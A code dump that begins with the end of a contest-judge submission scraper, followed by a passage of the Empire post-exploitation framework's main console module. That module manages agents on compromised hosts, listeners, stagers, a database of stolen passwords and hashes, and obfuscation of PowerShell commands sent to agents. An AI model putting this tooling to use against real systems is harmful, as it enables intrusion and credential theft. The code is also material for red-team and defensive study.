spacelimit = float(re.findall(r'(\d+\.?\d*)MB', limits)[0]) * 1024
except:
spacelimit = -1
problems.append({
'problem_name': problem_name,
'remote_problem_id': remote_problem_id,
'remote_problem_url': '',
'problem_text': '',
'problem_text_url': '',
'problem_text_file': problem_pdf,
'time_limit': timelimit,
'space_limit': spacelimit,
'allowed_lang': ['c', 'cpp', 'java', 'py3']
})
return problems
def submit_contest_problem(self, contest_id, problem_id, code, lang):
self.check_login()
self.switch_contest(contest_id)
if lang not in ['c', 'cpp', 'java', 'py3']:
raise Exception('language error')
from urllib3 import encode_multipart_formdata
url = self.base_url + '/team/submit'
res = self.http.get(url=url)
res = BeautifulSoup(res.text, 'lxml')
try:
token = res.find('input', attrs={'id': 'submit_problem__token'})['value']
except TypeError:
token = None
problems = res.find('select', attrs={'id': 'submit_problem_problem'}).find_all('option')
for i in problems:
if i.text.startswith(f'{problem_id} -'):
problem_id = i['value']
headers = {'Content-Type': 'multipart/form-data'}
data = {}
ext = ''
if lang == 'c':
ext = 'c'
if lang == 'cpp':
ext = 'cpp'
if lang == 'java':
ext = 'java'
if lang == 'py3':
ext = 'py'
data['submit_problem[code][]'] = (f'temp.{ext}', code.encode('utf-8'))
data['submit_problem[language]'] = lang
data['submit_problem[problem]'] = problem_id
if token:
data['submit_problem[_token]'] = token
form_data = encode_multipart_formdata(data)
data = form_data[0]
headers['Content-Type'] = form_data[1]
res = self.http.post(url=url, headers=headers, data=data)
if len(res.history) == 0:
raise Exception('submit failed')
while True:
time.sleep(5)
finished, status = self.get_last_problem_status()
if finished:
return status
def switch_contest(self, contest_cid):
self.http.get(url=self.base_url + f'/team/change-contest/{contest_cid}')
def get_last_problem_status(self):
data = {
'compile_info': 'There were no compiler errors or warnings.',
'time_used': -1,
'memory_used': -1
}
url = self.base_url + '/team'
res = self.http.get(url=url)
soup = BeautifulSoup(res.text, 'lxml')
row = soup.find('div', class_='col').find('tbody').find('tr')
result = row.find_all('a')[-1].text.strip()
if result == 'pending':
return False, data
data['result'] = self.change_judge_result(result)
data['remote_result'] = result
if result == 'too-late':
return True, data
href = row.find('a')['href']
sid = re.findall('/submission/(.*)', href)[0]
url = self.base_url + '/team/submission/' + sid
res = self.http.get(url=url)
soup = BeautifulSoup(res.text, 'lxml')
if soup.find('pre'):
data['compile_info'] = soup.find('pre').text
return True, data
def change_judge_result(self, result: str):
result = result.upper()
dic = {
'CORRECT': 'AC',
'COMPILER-ERROR': 'CE',
'TIMELIMIT': 'TLE',
'RUN-ERROR': 'RE',
'WRONG-ANSWER': 'WA'
}
if result in dic:
return dic[result]
return 'UNKNOWN'
``` |
{
"source": "JiucyLucy/Empire",
"score": 2
} |
#### File: lib/common/empire.py
```python
from __future__ import absolute_import
from __future__ import print_function
# make version for Empire
from builtins import input
from builtins import range
from builtins import str
from typing import Optional
from datetime import datetime, timezone
from flask_socketio import SocketIO
VERSION = "3.7.2 BC Security Fork"
from pydispatch import dispatcher
import sys
import cmd
import sqlite3
import os
import hashlib
import time
import shlex
import pkgutil
import base64
import threading
import json
import random
import string
import time
# Empire imports
from . import helpers
from . import messages
from . import agents
from . import listeners
from . import modules
from . import stagers
from . import credentials
from . import users
from . import plugins
from .events import log_event
from zlib_wrapper import compress
from prompt_toolkit import PromptSession, HTML
from prompt_toolkit.completion import Completer
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.patch_stdout import patch_stdout
from lib.database.base import Session
from lib.database import models
from sqlalchemy import or_, func, and_
def xstr(s):
"""Safely cast to a string with a handler for None"""
if s is None:
return ''
return str(s)
# custom exceptions used for nested menu navigation
class NavMain(Exception):
"""
Custom exception class used to navigate to the 'main' menu.
"""
pass
class NavAgents(Exception):
"""
Custom exception class used to navigate to the 'agents' menu.
"""
pass
class NavListeners(Exception):
"""
Custom exception class used to navigate to the 'listeners' menu.
"""
pass
class MainMenu(cmd.Cmd):
"""
The main class used by Empire to drive the 'main' menu
displayed when Empire starts.
"""
def __init__(self, args=None):
cmd.Cmd.__init__(self)
# set up the event handling system
dispatcher.connect(self.handle_event, sender=dispatcher.Any)
# globalOptions[optionName] = (value, required, description)
self.globalOptions = {}
# currently active plugins:
# {'pluginName': classObject}
self.loadedPlugins = {}
time.sleep(1)
self.lock = threading.Lock()
# pull out some common configuration information
(self.isroot, self.installPath, self.ipWhiteList, self.ipBlackList, self.obfuscate,
self.obfuscateCommand) = helpers.get_config(
'rootuser, install_path,ip_whitelist,ip_blacklist,obfuscate,obfuscate_command')
# change the default prompt for the user
self.prompt = '(Empire) > '
self.do_help.__func__.__doc__ = '''Displays the help menu.'''
self.doc_header = 'Commands'
# Main, Agents, or
self.menu_state = 'Main'
# parse/handle any passed command line arguments
self.args = args
# instantiate the agents, listeners, and stagers objects
self.agents = agents.Agents(self, args=args)
self.credentials = credentials.Credentials(self, args=args)
self.stagers = stagers.Stagers(self, args=args)
self.modules = modules.Modules(self, args=args)
self.listeners = listeners.Listeners(self, args=args)
self.users = users.Users(self)
self.socketio: Optional[SocketIO] = None
self.resourceQueue = []
# A hashtable of autruns based on agent language
self.autoRuns = {}
self.handle_args()
self.startup_plugins()
message = "[*] Empire starting up..."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
# print the loading menu
messages.loading()
def handle_event(self, signal, sender):
"""
Whenver an event is received from the dispatcher, log it to the DB,
decide whether it should be printed, and if so, print it.
If self.args.debug, also log all events to a file.
"""
# load up the signal so we can inspect it
try:
signal_data = json.loads(signal)
except ValueError:
print(helpers.color("[!] Error: bad signal received {} from sender {}".format(signal, sender)))
return
# if this is related to a task, set task_id; this is its own column in
# the DB (else the column will be set to None/null)
task_id = None
if 'task_id' in signal_data:
task_id = signal_data['task_id']
if 'event_type' in signal_data:
event_type = signal_data['event_type']
else:
event_type = 'dispatched_event'
# print any signal that indicates we should
if ('print' in signal_data and signal_data['print']):
print(helpers.color(signal_data['message']))
# get a db cursor, log this event to the DB, then close the cursor
# TODO instead of "dispatched_event" put something useful in the "event_type" column
log_event(sender, event_type, json.dumps(signal_data), helpers.getutcnow(), task_id=task_id)
# if --debug X is passed, log out all dispatcher signals
if self.args.debug:
with open('empire.debug', 'a') as debug_file:
debug_file.write("%s %s : %s\n" % (helpers.get_datetime(), sender, signal))
if self.args.debug == '2':
# if --debug 2, also print the output to the screen
print(" %s : %s" % (sender, signal))
def startup_plugins(self):
"""
Load plugins at the start of Empire
"""
pluginPath = os.path.abspath("plugins")
print(helpers.color("[*] Searching for plugins at {}".format(pluginPath)))
# From walk_packages: "Note that this function must import all packages
# (not all modules!) on the given path, in order to access the __path__
# attribute to find submodules."
plugin_names = [name for _, name, _ in pkgutil.walk_packages([pluginPath])]
for plugin_name in plugin_names:
if plugin_name.lower() != 'example':
print(helpers.color("[*] Plugin {} found.".format(plugin_name)))
message = "[*] Loading plugin {}".format(plugin_name)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="empire")
plugins.load_plugin(self, plugin_name)
def check_root(self):
"""
Check if Empire has been run as root, and alert user.
"""
try:
if os.geteuid() != 0:
if self.isroot:
messages.title(VERSION)
print(
"[!] Warning: Running Empire as non-root, after running as root will likely fail to access prior agents!")
while True:
a = input(helpers.color("[>] Are you sure you want to continue (y) or (n): "))
if a.startswith("y"):
return
if a.startswith("n"):
self.shutdown()
sys.exit()
else:
pass
if os.geteuid() == 0:
if self.isroot:
pass
if not self.isroot:
config = Session().query(models.Config).all()
config.rootuser = True
Session().commit()
except Exception as e:
print(e)
def handle_args(self):
"""
Handle any passed arguments.
"""
if self.args.resource:
resourceFile = self.args.resource[0]
self.do_resource(resourceFile)
if self.args.listener or self.args.stager:
# if we're displaying listeners/stagers or generating a stager
if self.args.listener:
if self.args.listener == 'list':
messages.display_listeners(self.listeners.activeListeners)
messages.display_listeners(self.listeners.get_inactive_listeners(), "Inactive")
else:
activeListeners = self.listeners.activeListeners
targetListener = [l for l in activeListeners if self.args.listener in l[1]]
if targetListener:
targetListener = targetListener[0]
# messages.display_listener_database(targetListener)
# TODO: reimplement this logic
else:
print(helpers.color("\n[!] No active listeners with name '%s'\n" % (self.args.listener)))
else:
if self.args.stager == 'list':
print("\nStagers:\n")
print(" Name Description")
print(" ---- -----------")
for stagerName, stager in self.stagers.stagers.items():
print(" %s%s" % ('{0: <17}'.format(stagerName), stager.info['Description']))
print("\n")
else:
stagerName = self.args.stager
try:
targetStager = self.stagers.stagers[stagerName]
menu = StagerMenu(self, stagerName)
if self.args.stager_options:
for option in self.args.stager_options:
if '=' not in option:
print(helpers.color("\n[!] Invalid option: '%s'" % (option)))
print(helpers.color("[!] Please use Option=Value format\n"))
sys.exit()
# split the passed stager options by = and set the appropriate option
optionName, optionValue = option.split('=')
menu.do_set("%s %s" % (optionName, optionValue))
# generate the stager
menu.do_generate('')
else:
messages.display_stager(targetStager)
except Exception as e:
print(e)
print(helpers.color("\n[!] No current stager with name '%s'\n" % (stagerName)))
# Gracefully shutdown after launcher generation
self.shutdown()
sys.exit()
def shutdown(self):
"""
Perform any shutdown actions.
"""
print("\n" + helpers.color("[!] Shutting down..."))
message = "[*] Empire shutting down..."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
# enumerate all active servers/listeners and shut them down
self.listeners.shutdown_listener('all')
message = "[*] Shutting down plugins..."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
for plugin in self.loadedPlugins:
self.loadedPlugins[plugin].shutdown()
def cmdloop(self):
"""
The main cmdloop logic that handles navigation to other menus.
"""
while True:
try:
if self.menu_state == 'Agents':
self.do_agents('')
elif self.menu_state == 'Listeners':
self.do_listeners('')
else:
# display the main title
messages.title(VERSION)
# get active listeners, agents, and loaded modules
num_agents = self.agents.get_agents_db()
if num_agents:
num_agents = len(num_agents)
else:
num_agents = 0
num_modules = self.modules.modules
if num_modules:
num_modules = len(num_modules)
else:
num_modules = 0
num_listeners = self.listeners.activeListeners
if num_listeners:
num_listeners = len(num_listeners)
else:
num_listeners = 0
print(" " + helpers.color(str(num_modules), "green") + " modules currently loaded\n")
print(" " + helpers.color(str(num_listeners), "green") + " listeners currently active\n")
print(" " + helpers.color(str(num_agents), "green") + " agents currently active\n\n")
if len(self.resourceQueue) > 0:
self.cmdqueue.append(self.resourceQueue.pop(0))
cmd.Cmd.cmdloop(self)
# handle those pesky ctrl+c's
except KeyboardInterrupt as e:
self.menu_state = "Main"
try:
choice = input(helpers.color("\n[>] Exit? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
self.shutdown()
return True
else:
continue
except KeyboardInterrupt as e:
continue
# exception used to signal jumping to "Main" menu
except NavMain as e:
self.menu_state = "Main"
# exception used to signal jumping to "Agents" menu
except NavAgents as e:
self.menu_state = "Agents"
# exception used to signal jumping to "Listeners" menu
except NavListeners as e:
self.menu_state = "Listeners"
except Exception as e:
print(helpers.color("[!] Exception: %s" % (e)))
time.sleep(5)
def info(self):
"""
The main cmdloop logic that handles navigation to other menus.
"""
session = PromptSession(
complete_in_thread=True,
bottom_toolbar=self.bottom_toolbar,
refresh_interval=5
)
while True:
try:
# get active listeners, agents, and loaded modules
num_agents = len(self.agents.get_agents_db() or [])
num_modules = self.modules.modules
if num_modules:
num_modules = len(num_modules)
else:
num_modules = 0
num_listeners = self.listeners.activeListeners
if num_listeners:
num_listeners = len(num_listeners)
else:
num_listeners = 0
messages.headless_title(VERSION, num_modules, num_listeners, num_agents)
with patch_stdout():
text = session.prompt('Empire > ', refresh_interval=None)
print(helpers.color('[!] Type exit to quit'))
except KeyboardInterrupt:
print(helpers.color("[!] Type exit to quit"))
continue # Control-C pressed. Try again.
except EOFError:
break # Control-D pressed.
if text == 'exit':
choice = input(helpers.color("[>] Exit? [y/N] ", "red"))
if choice.lower() == "y":
self.shutdown()
return True
else:
pass
def bottom_toolbar(self):
return HTML(f'EMPIRE TEAM SERVER | ' +
str(len(self.agents.agents)) + ' Agents | ' +
str(len(self.listeners.activeListeners)) + ' Listeners | ' +
str(len(self.loadedPlugins)) + ' Plugins')
def print_topics(self, header, commands, cmdlen, maxcol):
"""
Print a nicely formatted help menu.
Adapted from recon-ng
"""
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
def emptyline(self):
"""
If any empty line is entered, do nothing.
"""
pass
###################################################
# CMD methods
###################################################
def do_plugins(self, args):
"List all available and active plugins."
pluginPath = os.path.abspath("plugins")
print(helpers.color("[*] Searching for plugins at {}".format(pluginPath)))
# From walk_packages: "Note that this function must import all packages
# (not all modules!) on the given path, in order to access the __path__
# attribute to find submodules."
pluginNames = [name for _, name, _ in pkgutil.walk_packages([pluginPath])]
numFound = len(pluginNames)
# say how many we found, handling the 1 case
if numFound == 1:
print(helpers.color("[*] {} plugin found".format(numFound)))
else:
print(helpers.color("[*] {} plugins found".format(numFound)))
# if we found any, list them
if numFound > 0:
print("\tName\tActive")
print("\t----\t------")
activePlugins = list(self.loadedPlugins.keys())
for name in pluginNames:
active = ""
if name in activePlugins:
active = "******"
print("\t" + name + "\t" + active)
print("")
print(helpers.color("[*] Use \"plugin <plugin name>\" to load a plugin."))
def do_plugin(self, pluginName):
"Load a plugin file to extend Empire."
pluginPath = os.path.abspath("plugins")
print(helpers.color("[*] Searching for plugins at {}".format(pluginPath)))
# From walk_packages: "Note that this function must import all packages
# (not all modules!) on the given path, in order to access the __path__
# attribute to find submodules."
pluginNames = [name for _, name, _ in pkgutil.walk_packages([pluginPath])]
if pluginName in pluginNames:
print(helpers.color("[*] Plugin {} found.".format(pluginName)))
message = "[*] Loading plugin {}".format(pluginName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
# 'self' is the mainMenu object
plugins.load_plugin(self, pluginName)
else:
raise Exception("[!] Error: the plugin specified does not exist in {}.".format(pluginPath))
def postcmd(self, stop, line):
if len(self.resourceQueue) > 0:
nextcmd = self.resourceQueue.pop(0)
self.cmdqueue.append(nextcmd)
def default(self, line):
"Default handler."
pass
def do_resource(self, arg):
"Read and execute a list of Empire commands from a file."
self.resourceQueue.extend(self.buildQueue(arg))
def buildQueue(self, resourceFile, autoRun=False):
cmds = []
if os.path.isfile(resourceFile):
with open(resourceFile, 'r') as f:
lines = []
lines.extend(f.read().splitlines())
else:
raise Exception("[!] Error: The resource file specified \"%s\" does not exist" % resourceFile)
for lineFull in lines:
line = lineFull.strip()
# ignore lines that start with the comment symbol (#)
if line.startswith("#"):
continue
# read in another resource file
elif line.startswith("resource "):
rf = line.split(' ')[1]
cmds.extend(self.buildQueue(rf, autoRun))
# add noprompt option to execute without user confirmation
elif autoRun and line == "execute":
cmds.append(line + " noprompt")
else:
cmds.append(line)
return cmds
def do_exit(self, line):
"Exit Empire"
raise KeyboardInterrupt
def do_agents(self, line):
"Jump to the Agents menu."
try:
agents_menu = AgentsMenu(self)
agents_menu.cmdloop()
except Exception as e:
raise e
def do_listeners(self, line):
"Interact with active listeners."
try:
listener_menu = ListenersMenu(self)
listener_menu.cmdloop()
except Exception as e:
raise e
def do_uselistener(self, line):
"Use an Empire listener module."
parts = line.split(' ')
if parts[0] not in self.listeners.loadedListeners:
print(helpers.color("[!] Error: invalid listener module"))
else:
listenerMenu = ListenerMenu(self, parts[0])
listenerMenu.cmdloop()
def do_usestager(self, line):
"Use an Empire stager."
try:
parts = line.split(' ')
if parts[0] not in self.stagers.stagers:
print(helpers.color("[!] Error: invalid stager module"))
elif len(parts) == 1:
stager_menu = StagerMenu(self, parts[0])
stager_menu.cmdloop()
elif len(parts) == 2:
listener = parts[1]
if not self.listeners.is_listener_valid(listener):
print(helpers.color("[!] Please enter a valid listener name or ID"))
else:
self.stagers.set_stager_option('Listener', listener)
stager_menu = StagerMenu(self, parts[0])
stager_menu.cmdloop()
else:
print(helpers.color("[!] Error in MainMenu's do_userstager()"))
except Exception as e:
raise e
def do_usemodule(self, line):
"Use an Empire module."
# Strip asterisks added by MainMenu.complete_usemodule()
line = line.rstrip("*")
if line not in self.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
try:
module_menu = ModuleMenu(self, line)
module_menu.cmdloop()
except Exception as e:
raise e
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
self.modules.search_modules(line.strip())
def do_creds(self, line):
"Add/display credentials to/from the database."
filterTerm = line.strip()
if filterTerm == "":
creds = self.credentials.get_credentials()
elif shlex.split(filterTerm)[0].lower() == "add":
# add format: "domain username password <notes> <credType> <sid>
args = shlex.split(filterTerm)[1:]
if len(args) == 3:
domain, username, password = args
if helpers.validate_ntlm(password):
# credtype, domain, username, password, host, sid="", notes=""):
self.credentials.add_credential("hash", domain, username, password, "")
else:
self.credentials.add_credential("plaintext", domain, username, password, "")
elif len(args) == 4:
domain, username, password, notes = args
if helpers.validate_ntlm(password):
self.credentials.add_credential("hash", domain, username, password, "", notes=notes)
else:
self.credentials.add_credential("plaintext", domain, username, password, "", notes=notes)
elif len(args) == 5:
domain, username, password, notes, credType = args
self.credentials.add_credential(credType, domain, username, password, "", notes=notes)
elif len(args) == 6:
domain, username, password, notes, credType, sid = args
self.credentials.add_credential(credType, domain, username, password, "", sid=sid, notes=notes)
else:
print(helpers.color("[!] Format is 'add domain username password <notes> <credType> <sid>"))
return
creds = self.credentials.get_credentials()
elif shlex.split(filterTerm)[0].lower() == "remove":
try:
args = shlex.split(filterTerm)[1:]
if len(args) != 1:
print(helpers.color("[!] Format is 'remove <credID>/<credID-credID>/all'"))
else:
if args[0].lower() == "all":
choice = input(helpers.color("[>] Remove all credentials from the database? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
self.credentials.remove_all_credentials()
else:
if "," in args[0]:
credIDs = args[0].split(",")
self.credentials.remove_credentials(credIDs)
elif "-" in args[0]:
parts = args[0].split("-")
credIDs = [x for x in range(int(parts[0]), int(parts[1]) + 1)]
self.credentials.remove_credentials(credIDs)
else:
self.credentials.remove_credentials(args)
except Exception:
print(helpers.color("[!] Error in remove command parsing."))
print(helpers.color("[!] Format is 'remove <credID>/<credID-credID>/all'"))
return
elif shlex.split(filterTerm)[0].lower() == "export":
args = shlex.split(filterTerm)[1:]
if len(args) != 1:
print(helpers.color("[!] Please supply an output filename/filepath."))
return
else:
self.credentials.export_credentials(args[0])
return
elif shlex.split(filterTerm)[0].lower() == "plaintext":
creds = self.credentials.get_credentials(credtype="plaintext")
elif shlex.split(filterTerm)[0].lower() == "hash":
creds = self.credentials.get_credentials(credtype="hash")
elif shlex.split(filterTerm)[0].lower() == "krbtgt":
creds = self.credentials.get_krbtgt()
else:
creds = self.credentials.get_credentials(filterTerm=filterTerm)
messages.display_credentials(creds)
def do_set(self, line):
"Set a global option (e.g. IP whitelists)."
parts = line.split(' ')
if len(parts) == 1:
print(helpers.color("[!] Please enter 'IP,IP-IP,IP/CIDR' or a file path."))
else:
if parts[0].lower() == "ip_whitelist":
if parts[1] != "" and os.path.exists(parts[1]):
try:
open_file = open(parts[1], 'r')
ipData = open_file.read()
open_file.close()
self.agents.ipWhiteList = helpers.generate_ip_list(ipData)
except Exception:
print(helpers.color("[!] Error opening ip file %s" % (parts[1])))
else:
self.agents.ipWhiteList = helpers.generate_ip_list(",".join(parts[1:]))
elif parts[0].lower() == "ip_blacklist":
if parts[1] != "" and os.path.exists(parts[1]):
try:
open_file = open(parts[1], 'r')
ipData = open_file.read()
open_file.close()
self.agents.ipBlackList = helpers.generate_ip_list(ipData)
except Exception:
print(helpers.color("[!] Error opening ip file %s" % (parts[1])))
else:
self.agents.ipBlackList = helpers.generate_ip_list(",".join(parts[1:]))
elif parts[0].lower() == "obfuscate":
if parts[1].lower() == "true":
if not helpers.is_powershell_installed():
print(helpers.color(
"[!] PowerShell is not installed and is required to use obfuscation, please install it first."))
else:
self.obfuscate = True
print(helpers.color("[!] Warning: Obfuscate is not compatible with Keyword Obfuscation"))
message = "[*] Obfuscating all future powershell commands run on all agents."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
elif parts[1].lower() == "false":
self.obfuscate = False
message = "[*] Future powershell commands run on all agents will not be obfuscated."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="empire")
else:
print(helpers.color("[!] Valid options for obfuscate are 'true' or 'false'"))
elif parts[0].lower() == "obfuscate_command":
self.obfuscateCommand = parts[1]
else:
print(helpers.color(
"[!] Please choose 'ip_whitelist', 'ip_blacklist', 'obfuscate', or 'obfuscate_command'"))
def do_reset(self, line):
"Reset a global option (e.g. IP whitelists)."
if line.strip().lower() == "ip_whitelist":
self.agents.ipWhiteList = None
if line.strip().lower() == "ip_blacklist":
self.agents.ipBlackList = None
def do_show(self, line):
"Show a global option (e.g. IP whitelists)."
if line.strip().lower() == "ip_whitelist":
print(self.agents.ipWhiteList)
if line.strip().lower() == "ip_blacklist":
print(self.agents.ipBlackList)
if line.strip().lower() == "obfuscate":
print(self.obfuscate)
if line.strip().lower() == "obfuscate_command":
print(self.obfuscateCommand)
def do_load(self, line):
"Loads Empire modules from a non-standard folder."
if line.strip() == '' or not os.path.isdir(line.strip()):
print(helpers.color("[!] Please specify a valid folder to load modules from."))
else:
self.modules.load_modules(rootPath=line.strip())
def do_reload(self, line):
"Reload one (or all) Empire modules."
if line.strip().lower() == "all":
# reload all modules
print("\n" + helpers.color("[*] Reloading all modules.") + "\n")
self.modules.load_modules()
elif os.path.isdir(line.strip()):
# if we're loading an external directory
self.modules.load_modules(rootPath=line.strip())
else:
if line.strip() not in self.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
print("\n" + helpers.color("[*] Reloading module: " + line) + "\n")
self.modules.reload_module(line)
def do_keyword(self, line):
"""
Add keyword to database for obfuscation
"""
parts = line.split(' ')
if 1 <= len(parts) < 3:
try:
if len(parts) == 1:
parts.append(random.choice(string.ascii_uppercase) + ''.join(
random.choice(string.ascii_uppercase + string.digits) for _ in range(4)))
Session().add(models.Function(keyword=parts[0],
replacement=parts[1]))
Session().commit()
print(helpers.color("[+] " + parts[0] + " replaced with " + parts[1]))
except Exception:
print(helpers.color("[!] Error: Couldn't connect to Database"))
else:
print(helpers.color("[!] Error: Entry must be a keyword or keyword and replacement string"))
def do_list(self, line):
"""
Lists active agents or listeners.
"""
parts = line.split(' ')
if parts[0].lower() == 'agents':
line = ' '.join(parts[1:])
all_agents = Session().query(models.Agent).all()
if line.strip().lower() == 'stale':
agentsToDisplay = []
for agent in all_agents:
if agent.stale:
# if the last checkin time exceeds the limit, remove it
agentsToDisplay.append(agent)
messages.display_agents(agentsToDisplay)
elif line.strip() != '':
# if we're listing an agents active in the last X minutes
try:
minutes = int(line.strip())
# grab just the agents active within the specified window (in minutes)
agentsToDisplay = []
for agent in all_agents:
diff = helpers.getutcnow() - agent.lastseen_time
too_old = diff.total_seconds() > int(minutes) * 60
if not too_old:
agentsToDisplay.append(agent)
messages.display_agents(agentsToDisplay)
except Exception:
print(helpers.color("[!] Please enter the minute window for agent checkin."))
else:
messages.display_agents(all_agents)
elif parts[0].lower() == 'listeners':
messages.display_listeners(self.listeners.activeListeners)
messages.display_listeners(self.listeners.get_inactive_listeners(), "Inactive")
def do_interact(self, line):
"Interact with a particular agent."
name = line.strip()
sessionID = self.agents.get_agent_id_db(name)
if sessionID and sessionID != '' and sessionID in self.agents.agents:
AgentMenu(self, sessionID)
else:
print(helpers.color("[!] Please enter a valid agent name"))
def do_preobfuscate(self, line):
"Preobfuscate PowerShell module_source files"
if not helpers.is_powershell_installed():
print(helpers.color(
"[!] PowerShell is not installed and is required to use obfuscation, please install it first."))
return
module = line.strip()
obfuscate_all = False
obfuscate_confirmation = False
reobfuscate = False
# Preobfuscate ALL module_source files
if module == "" or module == "all":
choice = input(helpers.color(
"[>] Preobfuscate all PowerShell module_source files using obfuscation command: \"" + self.obfuscateCommand + "\"?\nThis may take a substantial amount of time. [y/N] ",
"red"))
if choice.lower() != "" and choice.lower()[0] == "y":
obfuscate_all = True
obfuscate_confirmation = True
choice = input(helpers.color("[>] Force reobfuscation of previously obfuscated modules? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
reobfuscate = True
# Preobfuscate a selected module_source file
else:
module_source_fullpath = self.installPath + '/data/module_source/' + module
if not os.path.isfile(module_source_fullpath):
print(helpers.color("[!] The module_source file:" + module_source_fullpath + " does not exist."))
return
choice = input(helpers.color(
"[>] Preobfuscate the module_source file: " + module + " using obfuscation command: \"" + self.obfuscateCommand + "\"? [y/N] ",
"red"))
if choice.lower() != "" and choice.lower()[0] == "y":
obfuscate_confirmation = True
choice = input(helpers.color("[>] Force reobfuscation of previously obfuscated modules? [y/N] ", "red"))
if choice.lower() != "" and choice.lower()[0] == "y":
reobfuscate = True
# Perform obfuscation
if obfuscate_confirmation:
if obfuscate_all:
files = [file for file in helpers.get_module_source_files()]
else:
files = ['/data/module_source/' + module]
for file in files:
file = self.installPath + '/' + file
if reobfuscate or not helpers.is_obfuscated(file):
message = "[*] Obfuscating {}...".format(os.path.basename(file))
signal = json.dumps({
'print': True,
'message': message,
'obfuscated_file': os.path.basename(file)
})
dispatcher.send(signal, sender="empire")
else:
print(
helpers.color("[*] " + os.path.basename(file) + " was already obfuscated. Not reobfuscating."))
helpers.obfuscate_module(file, self.obfuscateCommand, reobfuscate)
def do_report(self, line):
"""
Produce report CSV and log files: sessions.csv, credentials.csv, master.log
"""
rows = Session().query(models.Agent.session_id, models.Agent.hostname, models.Agent.username,
models.Agent.checkin_time).all()
print(helpers.color("[*] Writing data/sessions.csv"))
try:
self.lock.acquire()
f = open('data/sessions.csv', 'w')
f.write("SessionID, Hostname, User Name, First Check-in\n")
for row in rows:
f.write(row[0] + ',' + row[1] + ',' + row[2] + ',' + str(row[3]) + '\n')
f.close()
finally:
self.lock.release()
# Credentials CSV
rows = Session().query(models.Credential.domain,
models.Credential.username,
models.Credential.host,
models.Credential.credtype,
models.Credential.password)\
.order_by(models.Credential.domain, models.Credential.credtype, models.Credential.host)\
.all()
print(helpers.color("[*] Writing data/credentials.csv"))
try:
self.lock.acquire()
f = open('data/credentials.csv', 'w')
f.write('Domain, Username, Host, Cred Type, Password\n')
for row in rows:
# todo vr maybe can replace with
# f.write(f'{row.domain},{row.username},{row.host},{row.credtype},{row.password}\n')
row = list(row)
for n in range(len(row)):
if isinstance(row[n], bytes):
row[n] = row[n].decode('UTF-8')
f.write(row[0] + ',' + row[1] + ',' + row[2] + ',' + row[3] + ',' + row[4] + '\n')
f.close()
finally:
self.lock.release()
# Empire Log
rows = self.run_report_query()
print(helpers.color("[*] Writing data/master.log"))
try:
self.lock.acquire()
f = open('data/master.log', 'w')
f.write('Empire Master Taskings & Results Log by timestamp\n')
f.write('=' * 50 + '\n\n')
for row in rows:
# todo vr maybe can replace with
# f.write(f'\n{xstr(row.timestamp)} - {xstr(row.username)} ({xstr(row.username)})> {xstr(row.hostname)}\n{xstr(row.taskID)}\n{xstr(row.results)}\n')
row = list(row)
for n in range(len(row)):
if isinstance(row[n], bytes):
row[n] = row[n].decode('UTF-8')
f.write('\n' + xstr(row[0]) + ' - ' + xstr(row[3]) + ' (' + xstr(row[2]) + ')> ' + xstr(
row[5]) + '\n' + xstr(row[6]) + '\n' + xstr(row[7]) + '\n')
f.close()
finally:
self.lock.release()
def substring(self, session, column, delimeter):
"""
https://stackoverflow.com/a/57763081
"""
if session.bind.dialect.name == 'sqlite':
return func.substr(column, func.instr(column, delimeter) + 1)
elif session.bind.dialect.name == 'mysql':
return func.substring_index(column, delimeter, -1)
def run_report_query(self):
reporting_sub_query = Session()\
.query(models.Reporting, self.substring(Session(), models.Reporting.name, '/').label('agent_name'))\
.filter(and_(models.Reporting.name.ilike('agent%'),
or_(models.Reporting.event_type == 'task',
models.Reporting.event_type == 'checkin')))\
.subquery()
return Session()\
.query(reporting_sub_query.c.timestamp,
reporting_sub_query.c.event_type,
reporting_sub_query.c.agent_name,
reporting_sub_query.c.taskID,
models.Agent.hostname,
models.User.username,
models.Tasking.data.label('task'),
models.Result.data.label('results'))\
.join(models.Tasking, and_(models.Tasking.id == reporting_sub_query.c.taskID,
models.Tasking.agent == reporting_sub_query.c.agent_name), isouter=True)\
.join(models.Result, and_(models.Result.id == reporting_sub_query.c.taskID,
models.Result.agent == reporting_sub_query.c.agent_name), isouter=True)\
.join(models.User, models.User.id == models.Tasking.user_id, isouter=True)\
.join(models.Agent, models.Agent.session_id == reporting_sub_query.c.agent_name, isouter=True)\
.all()
def complete_usemodule(self, text, line, begidx, endidx, language=None):
"Tab-complete an Empire module path."
module_names = list(self.modules.modules.keys())
module_names = [x for x in module_names if self.modules.modules[x].enabled]
# suffix each module requiring elevated context with '*'
for module_name in module_names:
try:
if self.modules.modules[module_name].info['NeedsAdmin']:
module_names[module_names.index(module_name)] = (module_name + "*")
# handle modules without a NeedAdmins info key
except KeyError:
pass
if language:
module_names = [(module_name[len(language) + 1:]) for module_name in module_names if
module_name.startswith(language)]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
module_names = [s[offs:] for s in module_names if s.startswith(mline)]
return module_names
def complete_reload(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path."
module_names = list(self.modules.modules.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in module_names if s.startswith(mline)]
def complete_usestager(self, text, line, begidx, endidx):
"Tab-complete an Empire stager module path."
stagerNames = list(self.stagers.stagers.keys())
if line.split(' ')[1].lower() in stagerNames:
listenerNames = self.listeners.get_listener_names()
